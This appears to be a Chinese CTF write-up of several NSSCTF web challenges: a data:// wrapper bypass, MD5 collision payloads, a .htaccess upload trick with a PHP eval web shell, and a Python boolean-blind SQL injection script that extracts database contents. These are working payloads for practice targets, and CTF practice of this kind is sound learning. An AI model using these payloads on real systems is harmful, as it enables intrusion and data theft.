image-20240223135432801

[GDOUCTF 2023]泄露的伪装

image-20240223140312152

orzorz.php

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
error_reporting(0);
if(isset($_GET['cxk'])){
    $cxk=$_GET['cxk'];
    if(file_get_contents($cxk)=="ctrl"){
        echo $flag;
    }else{
        echo "洗洗睡吧";
    }
}else{
    echo "nononoononoonono";
}
?> nononoononoonono

http://node5.anna.nssctf.cn:28206/orzorz.php?cxk=data://text/plain,ctrl

[NISACTF 2022]level-up

robots里

md5强碰撞

1
array1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&array2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

sha1强碰撞

[SWPUCTF 2021 新生赛]easyupload3.0

1
2
3
4
name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

SetHandler application/x-httpd-php

1
2
3
4
name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<?php eval($_POST['a']);phpinfo();?>
[SWPUCTF 2021 新生赛]error
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import time
import requests
url = "http://node4.anna.nssctf.cn:28666/index.php?id=1"
def bool_sql_database_name():
    global url
    flag=""
    for i in range(100):
        low = 32
        high = 127
        mid = (low + high) // 2
        while low < high:
            
            payload = "' and if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))<{},1,0) and 'a'='a".format(i,mid)
            #information_schema,mysql,performance_schema,test,test_db
            #payload = "' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='test'),{},1))<{},1,0) and 'a'='a".format(i,mid)
            #test_db->test_tb->id,flag,users
            #payload = "' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb'),{},1))<{},1,0) and 'a'='a".format(i,mid)
            #test_db->test_tb->id,flag,users
            #payload = "' and if(ascii(substr((select flag from test_db.test_tb),{},1))<{},1,0) and 'a'='a".format(i,mid)

            res = requests.get(url + payload)
            if '.....' in res.text:
                high = mid 
            else:
                low = mid +1
            mid = (low + high) // 2

        flag += chr(mid-1)
        print(flag)
bool_sql_database_name()